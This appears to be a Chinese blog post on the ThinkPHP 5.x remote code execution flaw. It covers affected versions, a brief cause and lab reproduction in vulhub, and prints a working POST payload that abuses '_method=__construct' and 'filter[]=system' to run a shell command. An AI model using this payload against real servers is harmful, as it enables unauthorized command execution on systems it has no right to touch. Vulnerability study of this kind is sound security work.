php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结

本文详细介绍了ThinkPHP 5.0.23及5.1.31之前的RCE漏洞,包括漏洞复现、原理、利用方式以及修复方法。建议使用最新版本以避免风险。
摘要由CSDN通过智能技术生成

一、ThinkPHP 5.0.23 rce漏洞复现与总结

漏洞复现

thinkphp 5.0.23 rce

thinkphp 5.0.23 rce源码下载:

github:https://github.com/top-think/framework/tree/v5.0.23

影响版本

ThinkPHP 5.0系列 < 5.0.23

ThinkPHP 5.1系列 < 5.1.31

安全版本

ThinkPHP 5.0系列 5.0.23

ThinkPHP 5.1系列 5.1.31

漏洞原理

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞利用

1.启动vulhub靶场,访问

344d26d8a300dc685d0b94dcef68bddd.png

2.抓包复现,完整的数据是:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值